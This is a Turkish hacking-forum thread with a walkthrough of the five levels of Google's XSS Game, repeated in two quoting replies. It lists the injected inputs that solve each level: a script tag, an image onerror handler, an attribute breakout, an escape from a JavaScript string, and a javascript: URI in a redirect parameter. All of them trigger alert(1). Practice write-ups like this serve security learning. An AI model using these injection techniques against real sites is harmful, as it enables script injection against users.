Google XSS Game | Level 1,Level 2,Level 3,Level 4,Level 5

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
21
1,815
31
MyKrallife
logo.png

Herkese Merhabalar Bugün Google XSS Game'de Bulunan 5 Makineyi çözeceğiz

shp4vi9.png

shp4vi9.png

6nldkai.png

6nldkai.png

shp4vi9.png

Level 1
İlk Başta Arama Motoru Karşılıyor. Arama Kısmına
<script>alert(1)</script>
Yazıyorum
tm5m59j.PNG

LEVEL 2


Şimdi <script>alert(1)</script> deneyeceğim

rrgfp62.PNG


Web Sayfası Herhalde <script> içeren mesajlara izin vermiyor
o zaman şunu yazabiliriz
<img src="resim.png" onerror="alert(1)">
Bu Kod resim.png'yi göstermek istiyor çalışmaz ise alert(1) kodunu çalıştırıyor
3zjx4te.PNG


Ve Level 2'yi çözdük


LEVEL 3
İlk olarak kaynak kodlarına bakmak istiyorum
Ve şunu gördüm
<img src="/static/level3/cloud" + num + ".jpg"/>
Ve url'de #1 bulunuyor
bu kod cloud1.jpg dosyasını gösteriyor
Peki burda xss açığını nasıl bulabiliriz ?
O Yüzden # kısmını boş bırakıp şunu yazıyorum
#' onerror="alert(1)"'
yani cloud.jpg dosyasını bulmaya çalışacak fakat bulamaz ise alert(1) kodunu
çalıştıracaktır
2asipx0.PNG

LEVEL 4
Bir zamanlayıcı bizi karşılıyor. Kaynak koduna tekrar bakıyorum
<img src="/static/loading.gif" onload="startTimer('{{timer}}');" />
burda zamanlayıcının içerisinde bizim girdiğimiz değeri koyuyor ve buraya
');alert(1);
yazarsam olmaz çünkü bir ' daha var
bu sebepten ötürü şu şekilde düzenliyorum
');alert(1);var b=('
Bunu zamanlayıcının entry'ine yazıyorum
lkv5qxj.PNG

LEVEL 5

Level 5 Bence basit bir makine bunun çok zor olacağını düşünmüştüm
İlk öncelikle sign up'a tıklıyorum
url'de next= kısmı dikkatimi çekti
Mailm adresimizi girdikten sonra url'in confirm olduğunu farkettim
yani next= kısmından sonra ne yazıyor ise o sayfaya yönlendiriyor
bende confirm olduktan sonra şunu yaptım
confirm?next=javascript:alert(1)
rjlz29n.PNG

Beni dinlediğiniz için teşekkürler görüşürüz
agme-ahmet-cem-ersever.gif

 
Son düzenleme:

MuhammedTr768

Kıdemli Üye
7 Kas 2021
2,933
21
1,815
31
MyKrallife
logo.png

Herkese Merhabalar Bugün Google XSS Game'de Bulunan 5 Makineyi çözeceğiz

shp4vi9.png

shp4vi9.png

6nldkai.png

6nldkai.png

shp4vi9.png

Level 1
İlk Başta Arama Motoru Karşılıyor. Arama Kısmına
<script>alert(1)</script>
Yazıyorum
tm5m59j.PNG

LEVEL 2


Şimdi <script>alert(1)</script> deneyeceğim

rrgfp62.PNG


Web Sayfası Herhalde <script> içeren mesajlara izin vermiyor
o zaman şunu yazabiliriz
<img src="resim.png" onerror="alert(1)">
Bu Kod resim.png'yi göstermek istiyor çalışmaz ise alert(1) kodunu çalıştırıyor
3zjx4te.PNG


Ve Level 2'yi çözdük


LEVEL 3
İlk olarak kaynak kodlarına bakmak istiyorum
Ve şunu gördüm
<img src="/static/level3/cloud" + num + ".jpg"/>
Ve url'de #1 bulunuyor
bu kod cloud1.jpg dosyasını gösteriyor
Peki burda xss açığını nasıl bulabiliriz ?
O Yüzden # kısmını boş bırakıp şunu yazıyorum
#' onerror="alert(1)"'
yani cloud.jpg dosyasını bulmaya çalışacak fakat bulamaz ise alert(1) kodunu
çalıştıracaktır
2asipx0.PNG

LEVEL 4
Bir zamanlayıcı bizi karşılıyor. Kaynak koduna tekrar bakıyorum
<img src="/static/loading.gif" onload="startTimer('{{timer}}');" />
burda zamanlayıcının içerisinde bizim girdiğimiz değeri koyuyor ve buraya
');alert(1);
yazarsam olmaz çünkü bir ' daha var
bu sebepten ötürü şu şekilde düzenliyorum
');alert(1);var b=('
Bunu zamanlayıcının entry'ine yazıyorum
lkv5qxj.PNG

LEVEL 5

Level 5 Bence basit bir makine bunun çok zor olacağını düşünmüştüm
İlk öncelikle sign up'a tıklıyorum
url'de next= kısmı dikkatimi çekti
Mailm adresimizi girdikten sonra url'in confirm olduğunu farkettim
yani next= kısmından sonra ne yazıyor ise o sayfaya yönlendiriyor
bende confirm olduktan sonra şunu yaptım
confirm?next=javascript:alert(1)
rjlz29n.PNG

Beni dinlediğiniz için teşekkürler görüşürüz
agme-ahmet-cem-ersever.gif

konu düzenlenmiştir ++
 

Blwe

Uzman üye
17 Şub 2021
1,472
17
1,554
Green/Moderasyon
logo.png

Herkese Merhabalar Bugün Google XSS Game'de Bulunan 5 Makineyi çözeceğiz

shp4vi9.png

shp4vi9.png

6nldkai.png

6nldkai.png

shp4vi9.png

Level 1
İlk Başta Arama Motoru Karşılıyor. Arama Kısmına
<script>alert(1)</script>
Yazıyorum
tm5m59j.PNG

LEVEL 2


Şimdi <script>alert(1)</script> deneyeceğim

rrgfp62.PNG


Web Sayfası Herhalde <script> içeren mesajlara izin vermiyor
o zaman şunu yazabiliriz
<img src="resim.png" onerror="alert(1)">
Bu Kod resim.png'yi göstermek istiyor çalışmaz ise alert(1) kodunu çalıştırıyor
3zjx4te.PNG


Ve Level 2'yi çözdük


LEVEL 3
İlk olarak kaynak kodlarına bakmak istiyorum
Ve şunu gördüm
<img src="/static/level3/cloud" + num + ".jpg"/>
Ve url'de #1 bulunuyor
bu kod cloud1.jpg dosyasını gösteriyor
Peki burda xss açığını nasıl bulabiliriz ?
O Yüzden # kısmını boş bırakıp şunu yazıyorum
#' onerror="alert(1)"'
yani cloud.jpg dosyasını bulmaya çalışacak fakat bulamaz ise alert(1) kodunu
çalıştıracaktır
2asipx0.PNG

LEVEL 4
Bir zamanlayıcı bizi karşılıyor. Kaynak koduna tekrar bakıyorum
<img src="/static/loading.gif" onload="startTimer('{{timer}}');" />
burda zamanlayıcının içerisinde bizim girdiğimiz değeri koyuyor ve buraya
');alert(1);
yazarsam olmaz çünkü bir ' daha var
bu sebepten ötürü şu şekilde düzenliyorum
');alert(1);var b=('
Bunu zamanlayıcının entry'ine yazıyorum
lkv5qxj.PNG

LEVEL 5

Level 5 Bence basit bir makine bunun çok zor olacağını düşünmüştüm
İlk öncelikle sign up'a tıklıyorum
url'de next= kısmı dikkatimi çekti
Mailm adresimizi girdikten sonra url'in confirm olduğunu farkettim
yani next= kısmından sonra ne yazıyor ise o sayfaya yönlendiriyor
bende confirm olduktan sonra şunu yaptım
confirm?next=javascript:alert(1)
rjlz29n.PNG

Beni dinlediğiniz için teşekkürler görüşürüz
agme-ahmet-cem-ersever.gif

Eline sağlık..
 

JohnWick51

Uzman üye
20 Mar 2022
1,866
770
28
logo.png

Herkese Merhabalar Bugün Google XSS Game'de Bulunan 5 Makineyi çözeceğiz

shp4vi9.png

shp4vi9.png

6nldkai.png

6nldkai.png

shp4vi9.png

Level 1
İlk Başta Arama Motoru Karşılıyor. Arama Kısmına
<script>alert(1)</script>
Yazıyorum
tm5m59j.PNG

LEVEL 2


Şimdi <script>alert(1)</script> deneyeceğim

rrgfp62.PNG


Web Sayfası Herhalde <script> içeren mesajlara izin vermiyor
o zaman şunu yazabiliriz
<img src="resim.png" onerror="alert(1)">
Bu Kod resim.png'yi göstermek istiyor çalışmaz ise alert(1) kodunu çalıştırıyor
3zjx4te.PNG


Ve Level 2'yi çözdük


LEVEL 3
İlk olarak kaynak kodlarına bakmak istiyorum
Ve şunu gördüm
<img src="/static/level3/cloud" + num + ".jpg"/>
Ve url'de #1 bulunuyor
bu kod cloud1.jpg dosyasını gösteriyor
Peki burda xss açığını nasıl bulabiliriz ?
O Yüzden # kısmını boş bırakıp şunu yazıyorum
#' onerror="alert(1)"'
yani cloud.jpg dosyasını bulmaya çalışacak fakat bulamaz ise alert(1) kodunu
çalıştıracaktır
2asipx0.PNG

LEVEL 4
Bir zamanlayıcı bizi karşılıyor. Kaynak koduna tekrar bakıyorum
<img src="/static/loading.gif" onload="startTimer('{{timer}}');" />
burda zamanlayıcının içerisinde bizim girdiğimiz değeri koyuyor ve buraya
');alert(1);
yazarsam olmaz çünkü bir ' daha var
bu sebepten ötürü şu şekilde düzenliyorum
');alert(1);var b=('
Bunu zamanlayıcının entry'ine yazıyorum
lkv5qxj.PNG

LEVEL 5

Level 5 Bence basit bir makine bunun çok zor olacağını düşünmüştüm
İlk öncelikle sign up'a tıklıyorum
url'de next= kısmı dikkatimi çekti
Mailm adresimizi girdikten sonra url'in confirm olduğunu farkettim
yani next= kısmından sonra ne yazıyor ise o sayfaya yönlendiriyor
bende confirm olduktan sonra şunu yaptım
confirm?next=javascript:alert(1)
rjlz29n.PNG

Beni dinlediğiniz için teşekkürler görüşürüz
agme-ahmet-cem-ersever.gif

Ellerine saglik
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.